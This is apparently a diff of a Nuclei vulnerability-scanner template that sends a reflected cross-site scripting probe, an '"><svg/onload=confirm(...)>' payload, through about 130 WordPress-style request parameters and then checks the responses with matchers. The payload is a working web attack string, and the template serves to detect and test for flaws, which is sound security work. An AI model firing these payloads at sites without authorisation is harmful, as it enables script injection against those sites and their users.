"ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E" + - "image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E" + - "up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E" + - "option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E" + - "taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E" + - "deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E" + - "tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E" + - "widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E" + - "num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E" + - "admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E" + - "location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E" host-redirects: true max-redirects: 1 @@ -63,15 +66,15 @@ http: words: - "text/html" - - type: word - part: body - condition: or - negative: true - words: - - "Access Denied" - - "You don't have permission to access" - - type: status status: - 200 + + - type: word + part: body + condition: or + words: + - "Access Denied" + - "You don't have permission to access" + negative: true # digest: 4a0a004730450220422fa88099c081d3188fb7d1e5615710b29e2f5ec74a4daccf72f1faa714fcda02210093290ee6f988d9ad886291b9c801bbdd358e83fdcdd779ecbf65413328fc6d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file